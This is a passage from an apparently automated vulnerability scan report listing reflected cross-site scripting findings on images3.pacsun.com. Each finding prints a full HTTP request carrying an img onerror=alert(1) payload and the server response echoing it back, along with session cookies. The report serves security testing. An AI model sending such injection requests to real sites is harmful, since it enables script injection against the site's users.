Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/8203333_sw_001e3b3c<img src=a onerror=alert(1)>13da9e9c6eb

3.144. http://images3.pacsun.com/is/image/pacsunproducts/8203333_sw_004 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8203333_sw_004

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8700b<img%20src%3da%20onerror%3dalert(1)>bdffb2a02a2 was submitted in the REST URL parameter 4. This input was echoed as 8700b<img src=a onerror=alert(1)>bdffb2a02a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8203333_sw_0048700b<img%20src%3da%20onerror%3dalert(1)>bdffb2a02a2?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8203333_sw_0048700b<img src=a onerror=alert(1)>bdffb2a02a2

3.145. http://images3.pacsun.com/is/image/pacsunproducts/8203333_sw_014 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8203333_sw_014

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 64f02<img%20src%3da%20onerror%3dalert(1)>b6c57a1461e was submitted in the REST URL parameter 4. This input was echoed as 64f02<img src=a onerror=alert(1)>b6c57a1461e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8203333_sw_01464f02<img%20src%3da%20onerror%3dalert(1)>b6c57a1461e?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8203333_sw_01464f02<img src=a onerror=alert(1)>b6c57a1461e

3.146. http://images3.pacsun.com/is/image/pacsunproducts/8212524_01_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8212524_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ee25<img%20src%3da%20onerror%3dalert(1)>3b765dcf0f was submitted in the REST URL parameter 4. This input was echoed as 2ee25<img src=a onerror=alert(1)>3b765dcf0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8212524_01_0012ee25<img%20src%3da%20onerror%3dalert(1)>3b765dcf0f?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8212524_01_0012ee25<img src=a onerror=alert(1)>3b765dcf0f

3.147. http://images3.pacsun.com/is/image/pacsunproducts/8227621_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8227621_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7774f<img%20src%3da%20onerror%3dalert(1)>c982e7ff168 was submitted in the REST URL parameter 4. This input was echoed as 7774f<img src=a onerror=alert(1)>c982e7ff168 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8227621_017774f<img%20src%3da%20onerror%3dalert(1)>c982e7ff168?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8227621_017774f<img src=a onerror=alert(1)>c982e7ff168

3.148. http://images3.pacsun.com/is/image/pacsunproducts/8232514_01_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8232514_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a1360<img%20src%3da%20onerror%3dalert(1)>b908ff5f0c7 was submitted in the REST URL parameter 4. This input was echoed as a1360<img src=a onerror=alert(1)>b908ff5f0c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8232514_01_001a1360<img%20src%3da%20onerror%3dalert(1)>b908ff5f0c7?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8232514_01_001a1360<img src=a onerror=alert(1)>b908ff5f0c7

3.149. http://images3.pacsun.com/is/image/pacsunproducts/8250979_01_003 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8250979_01_003

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2691d<img%20src%3da%20onerror%3dalert(1)>ff0958088bd was submitted in the REST URL parameter 4. This input was echoed as 2691d<img src=a onerror=alert(1)>ff0958088bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8250979_01_0032691d<img%20src%3da%20onerror%3dalert(1)>ff0958088bd?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:08 GMT
Connection: close

Unable to find /pacsunproducts/8250979_01_0032691d<img src=a onerror=alert(1)>ff0958088bd

3.150. http://images3.pacsun.com/is/image/pacsunproducts/8260952_01_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8260952_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1cace<img%20src%3da%20onerror%3dalert(1)>1bd330bfb20 was submitted in the REST URL parameter 4. This input was echoed as 1cace<img src=a onerror=alert(1)>1bd330bfb20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8260952_01_0011cace<img%20src%3da%20onerror%3dalert(1)>1bd330bfb20?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:21 GMT
Connection: close

Unable to find /pacsunproducts/8260952_01_0011cace<img src=a onerror=alert(1)>1bd330bfb20

3.151. http://images3.pacsun.com/is/image/pacsunproducts/8266561_01_048 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8266561_01_048

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 15073<img%20src%3da%20onerror%3dalert(1)>f2ab600da00 was submitted in the REST URL parameter 4. This input was echoed as 15073<img src=a onerror=alert(1)>f2ab600da00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8266561_01_04815073<img%20src%3da%20onerror%3dalert(1)>f2ab600da00?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8266561_01_04815073<img src=a onerror=alert(1)>f2ab600da00

3.152. http://images3.pacsun.com/is/image/pacsunproducts/8270852_01_008 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8270852_01_008

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2a01c<img%20src%3da%20onerror%3dalert(1)>c59a7bb49cf was submitted in the REST URL parameter 4. This input was echoed as 2a01c<img src=a onerror=alert(1)>c59a7bb49cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8270852_01_0082a01c<img%20src%3da%20onerror%3dalert(1)>c59a7bb49cf?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8270852_01_0082a01c<img src=a onerror=alert(1)>c59a7bb49cf

3.153. http://images3.pacsun.com/is/image/pacsunproducts/8270852_sw_008 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8270852_sw_008

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 30a03<img%20src%3da%20onerror%3dalert(1)>b779fe1f7b9 was submitted in the REST URL parameter 4. This input was echoed as 30a03<img src=a onerror=alert(1)>b779fe1f7b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8270852_sw_00830a03<img%20src%3da%20onerror%3dalert(1)>b779fe1f7b9?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8270852_sw_00830a03<img src=a onerror=alert(1)>b779fe1f7b9

3.154. http://images3.pacsun.com/is/image/pacsunproducts/8270852_sw_010 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8270852_sw_010

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d2df7<img%20src%3da%20onerror%3dalert(1)>13cbaaf6192 was submitted in the REST URL parameter 4. This input was echoed as d2df7<img src=a onerror=alert(1)>13cbaaf6192 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8270852_sw_010d2df7<img%20src%3da%20onerror%3dalert(1)>13cbaaf6192?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8270852_sw_010d2df7<img src=a onerror=alert(1)>13cbaaf6192

3.155. http://images3.pacsun.com/is/image/pacsunproducts/8281289_01_066 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8281289_01_066

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16b4a<img%20src%3da%20onerror%3dalert(1)>08531805115 was submitted in the REST URL parameter 4. This input was echoed as 16b4a<img src=a onerror=alert(1)>08531805115 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8281289_01_06616b4a<img%20src%3da%20onerror%3dalert(1)>08531805115?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
